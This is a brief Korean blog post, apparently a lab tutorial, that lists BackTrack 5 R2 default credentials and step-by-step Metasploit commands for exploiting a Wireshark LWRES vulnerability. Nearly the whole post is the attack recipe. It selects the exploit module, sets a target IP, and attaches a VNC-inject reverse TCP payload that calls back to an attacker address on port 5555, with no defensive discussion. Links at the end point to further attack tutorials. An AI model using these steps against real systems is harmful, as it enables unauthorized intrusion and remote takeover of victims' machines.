728x90
BT5R2
- root
- toor
- startx
- msfconsole
[wireshark 취약점]
1. msfconsole
2. search wireshark
3. use multi/misc/wireshark_lwres_getaddrbyname
4. show options
5. set rhost 타겟IP
ex) set rhost 192.168.198.128
6. show targets
7. set target 4
8. show payloads
9. set payload windows/vncinject/reverse_tcp
10. set lhost 공격자IP
ex) set lhost 192.168.198.142
11. set lport 5555
'it > network' 카테고리의 다른 글
[BT5R2] 웹 취약점을 이용한 리버스 커넥션 (0) | 2013.08.07 |
---|---|
[BT5R2] MS10_002_aurora 공격 (0) | 2013.07.30 |
[BT5R2] MS08-067 Netapi 공격 (0) | 2013.07.30 |